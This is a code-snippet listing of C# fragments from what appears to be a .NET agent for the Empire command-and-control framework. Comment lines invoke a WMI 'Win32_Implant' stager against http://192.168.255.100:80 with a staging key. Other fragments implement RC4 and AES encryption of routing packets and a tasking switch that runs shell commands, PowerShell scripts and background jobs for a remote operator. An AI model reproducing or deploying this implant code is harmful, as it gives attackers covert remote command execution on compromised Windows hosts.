예제 #1
0
        //Invoke-WmiMethod -Class Win32_Implant -Name EmpireStager -ArgumentList "powershell","http://192.168.255.100:80","q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5"
        //Invoke-WmiMethod -Class Win32_Implant -Name EmpireStager -ArgumentList "dotnet","http://192.168.255.100:80","q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5"
        public static string Empire(string server, string stagingKey, string language)
        {
            EmpireStager empireStager = new EmpireStager(server, stagingKey, language);

            empireStager.execute();
            return(empireStager.GetOutput());
        }
예제 #2
0
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] newRoutingPacket(byte[] encryptedBytes, Int32 meta)
        {
            Int32 encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            byte[] data = Encoding.ASCII.GetBytes(sessionId);
            data = Misc.combine(data, new byte[4] {
                0x01, Convert.ToByte(meta), 0x00, 0x00
            });
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            byte[] initializationVector = newInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, stagingKeyBytes);
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
예제 #3
0
        ////////////////////////////////////////////////////////////////////////////////
        public Byte[] task121(Coms.PACKET packet)
        {
            Byte[] scriptBytes = EmpireStager.aesDecrypt(sessionKey, jobTracking.importedScript);
            String script      = Encoding.UTF8.GetString(scriptBytes);
            String jobId       = jobTracking.startAgentJob(script + ";" + packet.data);

            return(encodePacket(packet.type, "Job started: " + jobId, packet.taskId));
        }
예제 #4
0
        ////////////////////////////////////////////////////////////////////////////////
        public Byte[] task120(Coms.PACKET packet)
        {
            Random random = new Random();

            Byte[] initializationVector = new Byte[16];
            random.NextBytes(initializationVector);
            jobTracking.importedScript = EmpireStager.aesEncrypt(sessionKeyBytes, initializationVector, Encoding.ASCII.GetBytes(packet.data));
            return(encodePacket(packet.type, "Script successfully saved in memory", packet.taskId));
        }
예제 #5
0
        ////////////////////////////////////////////////////////////////////////////////
        private void processTaskingPackets(byte[] encryptedTask)
        {
            byte[] taskingBytes = EmpireStager.aesDecrypt(sessionKey, encryptedTask);
            PACKET firstPacket  = decodePacket(taskingBytes, 0);

            byte[] resultPackets = processTasking(firstPacket);
            sendMessage(resultPackets);

            Int32  offset    = 12 + (Int32)firstPacket.length;
            String remaining = firstPacket.remaining;
        }
예제 #6
0
 //Invoke-WmiMethod -Class Win32_Implant -Name EmpireStager -ArgumentList "powershell","http://192.168.255.100:80","q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5"
 //Invoke-WmiMethod -Class Win32_Implant -Name EmpireStager -ArgumentList "dotnet","http://192.168.255.100:80","q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5"
 public static void Empire(String server, String stagingKey, String language)
 {
     try
     {
         EmpireStager empireStager = new EmpireStager(server, stagingKey, language);
         empireStager.execute();
     }
     catch (Exception ex)
     {
         Console.WriteLine("[-] {0}", ex.Message);
     }
 }
예제 #7
0
        ////////////////////////////////////////////////////////////////////////////////
        internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking)
        {
            this.jobTracking = jobTracking;

            if (packetData.Length < 20)
            {
                return;
            }
            Int32 offset = 0;

            while (offset < packetData.Length)
            {
                byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
                byte[] routingInitializationVector = routingPacket.Take(4).ToArray();
                byte[] routingEncryptedData        = packetData.Skip(4).Take(16).ToArray();
                offset += 20;

                byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKeyBytes);

                byte[] routingData     = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
                String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());
                try
                {
                    byte language = routingPacket[8];
                    byte metaData = routingPacket[9];
                }
                catch (IndexOutOfRangeException error)
                {
                    WriteOutputBad(error.ToString());
                }
                byte[] extra        = routingPacket.Skip(10).Take(2).ToArray();
                UInt32 packetLength = BitConverter.ToUInt32(routingData, 12);

                if (packetLength < 0)
                {
                    break;
                }

                if (sessionId == packetSessionId)
                {
                    byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray();
                    offset += (Int32)packetLength;
                    try
                    {
                        processTaskingPackets(encryptedData);
                    }
                    catch (Exception error)
                    {
                        WriteOutputBad(error.ToString());
                    }
                }
            }
        }
예제 #8
0
        ////////////////////////////////////////////////////////////////////////////////
        //The hard part
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] processTasking(PACKET packet)
        {
            byte[] returnPacket = new byte[0];
            try
            {
                //Change this to a switch : case
                Int32 type = packet.type;
                switch (type)
                {
                case 1:
                    byte[] systemInformationBytes = EmpireStager.GetSystemInformation("0", "servername");
                    String systemInformation      = Encoding.ASCII.GetString(systemInformationBytes);
                    return(encodePacket(1, systemInformation, packet.taskId));

                case 2:
                    String message = "[!] Agent " + sessionId + " exiting";
                    sendMessage(encodePacket(2, message, packet.taskId));
                    Environment.Exit(0);
                    //This is still dumb
                    return(new byte[0]);

                case 40:
                    String[] parts = packet.data.Split(' ');
                    String   output;
                    if (parts.Length == 1)
                    {
                        output = Agent.invokeShellCommand(parts[0], "");
                    }
                    else
                    {
                        output = Agent.invokeShellCommand(parts[0], parts[1]);
                    }
                    byte[] packetBytes = encodePacket(packet.type, output, packet.taskId);
                    return(packetBytes);

                case 41:
                    return(task41(packet));

                case 42:
                    return(task42(packet));

                case 50:
                    List <String> runningJobs = new List <String>(jobTracking.jobs.Keys);
                    return(encodePacket(packet.type, runningJobs.ToArray(), packet.taskId));

                case 51:
                    return(task51(packet));

                case 100:
                    return(encodePacket(packet.type, Agent.runPowerShell(packet.data), packet.taskId));

                case 101:
                    return(task101(packet));

                case 110:
                    String jobId = jobTracking.startAgentJob(packet.data);
                    return(encodePacket(packet.type, "Job started: " + jobId, packet.taskId));

                case 111:
                    return(encodePacket(packet.type, "Not Implimented", packet.taskId));

                case 120:
                    return(task120(packet));

                case 121:
                    return(task121(packet));

                default:
                    return(encodePacket(0, "Invalid type: " + packet.type, packet.taskId));
                }
            }
            catch (Exception error)
            {
                return(encodePacket(packet.type, "Error running command: " + error, packet.taskId));
            }
        }